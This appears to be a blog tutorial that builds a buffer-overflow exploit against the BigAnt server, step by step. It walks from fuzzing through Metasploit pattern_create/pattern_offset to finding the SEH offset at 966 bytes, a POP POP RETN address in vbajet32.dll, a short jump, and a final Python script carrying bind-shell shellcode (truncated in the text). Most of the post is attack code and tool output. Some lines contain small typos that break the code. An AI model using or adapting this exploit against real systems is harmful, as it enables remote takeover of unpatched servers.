Now, we will try exploit BigAnt Application. Let's try it step by step..
First, prepare the fuzzing
First, prepare the fuzzing
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41"
* 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connect=sock.connect((target_address,
target_port))
sock.send(buffer)
sock.close()
after that, run BigAnt
then, open OllyDbg and Attach BigAnt applications. Choose AntServer
Run a fuzzer. To see the results, select the tab view - SEH Chain. And The result is
in the image above, BigAnt 2500 crash with a buffer that we send. The results are shown with the number 41 as shown above.
Next, try to make the pattern of 2500 byte through # pattern_create
root@bt:/opt/metasploit/msf3/tools#
./pattern_create.rb 2500
enter the result into the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV " + "\x41"
*
"Aa0Aa1Aa2Aa3A . ." #patter_create 2500
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connect=sock.connect((target_add"ress,
target_port))
sock.send(buffer)
sock.close()
after that try restarting OllyDbg and BigAnt and rerun fuzzernya. So the result
after the result has been that we can, try to insert into # pattern_offset
root @ bt :/ opt/metasploit/msf3/tools #. / pattern_offset.rb 42326742
966
conclusion is that it takes the value buffer of 966 bytes for the SEH.
After we have the address that used for SEH, enter the address that has a command offset vbajet32dll POP, RETN POP into fuzzer.
To get the offset address vbajet32dll, select the tab view-executable modules - double click VBAJET32. After that, right click - search for - sequence of command. Tyep as below
and the result is
Try doing a Break Point before run fuzzer. If the result is true
we need 6 springboard, while memory space that is there is only 4 bytes.
Therefore, it takes 2 bytes to achieve it. So we must modifications the fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2500 -
len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connect=sock.connect((target_address,
target_port))
sock.send(buffer)
sock.close()
do breakpoint as before, so the result is
next is to create shellcode or payload with tools # msfweb
root @ bt :/ pentest/exploits/framework2 #. / msfweb
+ ---- = [Metasploit Framework Web Interface (127.0.0.1:55555)
enter the IP address above into your browser
insert the result of Genarate Payload into the Fuzzer
import socket
target_address="192.168.56.101"
target_port=6660
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 16
buffer+=
("\xda\xdf\x29\xc9 . .) #Bind Shell
buffer+= "\x90" * (2500 -
len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connect=sock.connect((target_address,
target_port))
sock.send(buffer)
sock.close()
SUCCESSFULLY
GOODLUCK FOR YOUR TRY HARDER !!!
0 komentar:
Posting Komentar